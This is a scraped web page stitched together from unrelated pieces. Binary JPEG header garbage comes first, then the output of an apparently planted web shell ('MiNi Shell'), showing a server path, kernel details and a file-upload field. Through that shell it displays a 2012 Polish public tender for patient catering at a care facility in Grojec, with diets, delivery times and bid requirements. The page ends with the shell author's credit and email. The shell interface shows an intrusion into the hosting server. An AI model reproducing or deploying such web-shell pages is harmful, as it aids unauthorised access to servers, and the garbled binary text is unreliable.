JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120313/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120313/76248-N-2012.html

<p class="kh_header"><b>Grojec: usługa cateringowa żywienia</b><br>
<b>Numer ogłoszenia: 76248 - 2012; data zamieszczenia: 13.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Zakłady Opiekuńczo-Lecznicze w Grojcu , Aleja Ogrodowa 1, 32-615 Grojec, woj. małopolskie, tel. 33 8428136, faks 33 8428903.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzol.cba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa cateringowa żywienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie: przygotowania i dostawy całodziennych posiłków dla pacjentów PZOL w Grojcu ul.Al.Ogrodowa 1
oraz odbioru odpadów pokonsumcyjnych.

Zakład posiada dwa oddziały: psychiatryczny i ogólny z podziałem na:
Oddział Psychiatryczny - II,IV
Oddział Ogólny              - I,III 
Średnia miesięczna ilość osobodni żywienia wynosi 3600,co stanowi  10800
przygotowywanych posiłków, uwzględniając dodatki w diecie cukrzycowej
/osobodzień-stawka dzienna żywienia rozumiana jako 3 posiłki dziennie we wszystkich dietach lub 5 posiłków w diecie cukrzycowej, wysokokalorycznej, wysokobiałkowej/

Posiłki dla pacjentów winny być dostarczane o  ściśle ustalonych godzinach
- śniadanie - godzina 7.00
- obiad       -  godzina 11.00
- kolacja    -  godzina 16.00
Za każde opóźnienie w dostarczeniu posiłków Wykonawca zapłaci kary umowne zawarte w umowie.
  
Przygotowanie posiłków odbywać się będzie z uwzględnieniem diet stosowanych
w tutejszym Zakładzie oraz zgodnie z zaleceniem lekarza. Żywienie pacjentów
w PZOL w Grojcu opiera się na niżej wymienionych dietach :
1.Dieta Podstawowa
- podstawowa mielona 
- podstawowa redukcyjna 1500 kcal
- podstawowa redukcyjna mielona 1500 kcal
- podstawowa redukcyjna 1000 kcal
- podstawowa redukcyjna mielona 1000 kcal
- podstawowa wysokokaloryczna - 5 posiłków
- podstawowa wysokokaloryczna mielona - 5 posiłków
- podstawowa z ograniczeniem soli
- podstawowa z ograniczeniem fosforu
- podstawowa z ograniczeniem potasu

2.Dieta Wątrobowa
- wątrobowa mielona
- wątrobowa bez mleka i produktów mlecznych
- wątrobowa bez mleka i produktów mlecznych mielona
- wątrobowa redukcyjna

3.Dieta żołądkowa
- żołądkowa mielona

4.Dieta Łatwostrawna
- łatwostrawna mielona

5.Dieta Cukrzycowa - 5 posiłków
- cukrzycowa redukcyjna - 5 posiłków
- cukrzycowa mielona - 5 posiłków
- cukrzycowa bez mleka, jarzyny, owoce gotowane- 5 posiłków

6.Dieta Wysokobiałkowa zawierająca 100-120g białka- 5 posiłków

7.Dieta Niskobiałkowa zawierająca do 40 g białka

8.Dieta Kleikowa

9.Diety indywidualne na zlecenie lekarza

10.Dieta niskotłuszczowa

11.Dieta z ograniczeniem produktów zawierających cholesterol

Diety mogą ulec zmianie w zależności od stanu zdrowia pacjentów.  
I.Ilość składników pokarmowych w diecie podstawowej dla 1 osoby

Kalorie                         kcal               2400
Białko ogółem              g                        88,20
Białko zwierzęce          g                        56
Tłuszcze                        g                       88
Węglowodany               g                     311        
Wapń                             g                         1,30
Żelazo                         mg                      14
Witamina A                mg                   1720
Witamina B1              mg                          1,30
Witamina B2              mg                           2,20
Witamina C                mg                       100
Błonnik                      mg                          32

II.Dzienna racja pokarmowa dla 1 osoby

 1.Produkty zbożowe                300 g
 2.Mleko i produkty mleczne:
     mleko    400g
     produkty fermentowane  100g
     sery twarogowe                 65g
  3.Jajka  20 g
  4.Mięso,drób,wędliny.ryby /bez kości   140g
  5.Masło,śmietana   30g
  6.Inne tłuszcze       20g
  7.Ziemniaki          400g
  8.Warzywa i owoce bogate w wit.C    250 g
  9.Inne warzywa i owoce                      300 g
10.Warzywa i owoce bogate w karoten 200 g
11.Strączkowe suche                                  2 g
12.Cukier i słodycze                                 45 g          


                      

Zamawiający zastrzega sobie prawo niezrealizowania całości zamówienia, jeżeli
jego indywidualne potrzeby będą mniejsze od przewidywanych.       

Wykonawca będzie przygotowywać posiłki w oparciu o system HACCP zgodnie z ustawą z 11.05.2001  o bezpieczeństwie żywności i żywienia /tekst jednolity -DZ.U. z 2010r Nr 136 poz 914 z późniejszymi zmianami/.

Wykonawca będzie zobowiązany do sporządzenia dziennych jadłospisów w formie 
tzw.dekadówki /10-dniowy jadłospis/dla wszystkich diet obowiązujących u Zamawiającego, z podaniem gramatury potraw. Jadłospis winien być przedstawiony do akceptacji osobie wyznaczonej przez Zamawiającego z 5-dniowym wyprzedzeniem. Zamawiający ma 2 dni na akceptację i wniesienie uwag do jadłospisu. Jeżeli jadłospis nie zostanie zaakceptowany przez Zamawiającego, Wykonawca w terminie 2-dniowym ma obowiązek dostarczyć nowy jadłospis do akceptacji.  
Jadłospis dekadowy/po akceptacji/ dostarczony będzie w 5 - kopiach.

Wykonawca będzie przygotowywać posiłki tradycyjne w okresie świąt Bożego Narodzenia, Wielkanocy oraz na okazyjne uroczystości.

Zamawianie ilości oraz rodzajów diet posiłków będzie się odbywało przez pracownika  tutejszego Zakładu z wyprzedzeniem 1 -dniowym do godziny 13.00 
z możliwością korekty zamówienia w dniu dostawy: do godziny 6.10 korekta śniadania, do godziny 10.00 korekta obiadu ,do godziny 15.00 korekta kolacji.

Dostarczanie posiłków winno odbywać się w odpowiednio przeznaczonych do tego celu pojemnikach termoizolacyjnych z atestem, wykonanych z tworzywa zabezpieczającego posiłki przed wylaniem i schłodzeniem:
termosy jednoskładnikowe przeznaczone do transportu gorących posiłków /zupa, napoje/
termosy wieloskładnikowe wypełnione pojemnikami, które występują w różnej
konfiguracji, zapewnią dostarczanie na oddziały /Psychiatryczny -II,IV, Ogólny I,III/ poszczególnych zamówionych posiłków-diet. Każdy pojemnik powinien być
opisany/ ilość porcji i rodzaj diety/.
Należy zapewnić wymagany standard Sanitarno-Epidemiologiczny.

Właścicielem niezbędnej ilości termosów jest Wykonawca.
Dbanie o czystość termosów/mycie po każdym dostarczonym posiłku i dezynfekcja/ należy do Wykonawcy. 

Posiłki muszą się charakteryzować wysoką jakością, posiadać właściwe walory smakowe i estetyczne oraz właściwą temperaturę nie niższą niż:
zupa - temperatura  75°C
II danie- temperatura 63° C
gorące napoje - temperatura  80° C
dania zimne / sery, wędliny, sałatki itp./ - 4°C 

Wykonawca zobowiązuje się do odbioru odpadów pokonsumpcyjnych. Odbiór następuje po każdym posiłku. Koszt transportu odpadów pokonsumpcyjnych ponosi Wykonawca. Pojemniki na odpady dostarcza Wykonawca, odpowiada  
on również za ich stan sanitarny.

Wykonawca zobowiązany jest do pobierania i przechowywania oznakowanych próbek pokarmowych stosownie do Rozporządzenia Ministra Zdrowia z dnia 
17 kwietnia 2007r w sprawie pobierania i przechowywania próbek żywności przez zakłady żywienia zbiorowego typu zamkniętego /Dz.U nr 80 poz 545/.

Zamawiający wyklucza użycia do przygotowania posiłków gotowych potraw
/półproduktów, mrożonych pierogów, klusek, pulpetów/.Wyklucza się możliwość
przygotowania potraw z proszku i mrożonych produktów.

Jadłospis winien uwzględnić:
zupę mleczną 
mieszane pieczywo
różnorodne wędliny /z podaniem w jadłospisie rodzaju wędliny/
do śniadań ,obiadów i kolacji dodatek sezonowych warzyw i owoców
różnorodne potrawy mięsne/ z podaniem w jadłospisie z jakiego mięsa jest przyrządzona potrawa/
zróżnicowane potrawy mączne/ kluski, naleśniki, makarony, pierogi -własny wyrób/
placki ziemniaczane /nie z proszku, mrożonek/ przynajmniej raz w miesiącu
pierogi /różny rodzaj/  2 razy w dekadzie / własny wyrób z wykluczeniem mrożonych/
naleśniki  1 raz w dekadzie  
potrawy z ryb /zalecane 1 raz w dekadzie/
zróżnicowane napoje na bazie mleka
przynajmniej raz w miesiącu ciasto własnego wypieku
Do przygotowywania potraw należy używać produktów wysokiej jakości i zawsze świeżych.

Wykonawca dostarcza na oddziały w razie zgłoszenia dodatki: cukier, herbata, suchary.

Wykonawca będzie zobowiązany do umożliwienia Zamawiającemu przeprowadzenia kontroli poprawności realizacji postanowień umowy, udostępnić 
Zamawiającemu niezbędne dokumenty / wartości odżywcze potraw, ilość i rodzaj produktów zużytych (w gramach na jedną osobę) do ich przygotowania, dokumenty z kontroli sanepidu i innych oceny stanu sanitarnego kuchni i pomieszczeń sanitarnych, jadłospisów dokonanej przez Sanepid/.

W przypadku zakwestionowania wymagań dotyczących realizacji zamówienia, Wykonawca zapłaci Zamawiającemu kary umowne miedzy innymi za opóźnienia w dostarczaniu posiłków, za dostarczenie posiłków złej jakości
Osobami upoważnionymi ze strony Zamawiającego do kontroli posiłków są:
Dietetyk, pielęgniarka koordynująca lub upoważnione pielęgniarki.
Wymienieni wyżej pracownicy uprawnieni są zarówno do wstępnej kontroli organoleptycznej jak i do degustacji posiłków przed ich wydaniem. Odpowiednia adnotacja poczyniona zostanie w jadłospisie z zaznaczeniem dnia i godziny oceny.

Za uchybienia ujawnione w trakcie kontroli np. Sanepidu wynikające ze świadczonej przez Wykonawcę usługi, której następstwem będą m.in. mandaty, kary odpowiada Wykonawca.

Faktura będzie wystawiona na podstawie rejestru osobodni żywienia prowadzonych i dostarczonych do 2 -go dnia po zakończeniu miesiąca przez Zamawiającego w której należy wyszczególnić odrębnie ilość wydanych śniadań, obiadów i kolacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.20.00-3, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości:4.600 złotych
Wadium wnosi się przed upływem terminu składania ofert.
Wadium może być wniesione w jednej lub kilku następujących formach:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-	gwarancjach bankowych;
-	gwarancjach ubezpieczeniowych;
-	poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r Nr 42, poz.275).
Wadium wnoszone w pieniądzu wpłacić należy przelewem na rachunek bankowy: 
Bank Spółdzielczy w Andrychowie o)Oświęcim nr 87 8110 1023 2003 0300 8852 0001 
W przypadku wniesienia wadium w innej formie niż pieniądz oryginał należy złożyć w dziale księgowości w siedzibie Zamawiającego.
Potwierdzenie wpłacenia lub wadium w innej formie niż pieniądz należy złożyć w formie uwierzytelnionej kserokopii w osobnej kopercie z napisem )Potwierdzenie wpłaty wadium)
wraz z ofertą w Sekretariacie Zamawiającego w Grojcu, Al.Ogrodowa 1.
Wadium zostanie zwrócone zgodnie art.46 ustawy PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg reguły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg reguły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg reguły spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">-oświadczenie o posiadaniu zezwolenia na usługi transportowe w zakresie przewozu żywności na samochód/samochody, z którymi wykonawca będzie wykonywał zamówienie
-oświadczenie wykonawcy czy przedmiot zamówienia zostanie wykonany własnymi siłami czy przy pomocy podwykonawców.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu zawartych w art. 22 ust. 1 ustawy PZP; 
-oświadczenie wykonawcy, że nie podlega wykluczeniu z art. 24 ust.1 i 2 ustawy       
         PZP;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzol.cba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PZOL w Grojcu
Aleja Ogrodowa 1
32-615 Grojec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2012 godzina 09:00, miejsce: Sekretariat PZOL Grojec
32-615 Grojec, Aleja Ogrodowa 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com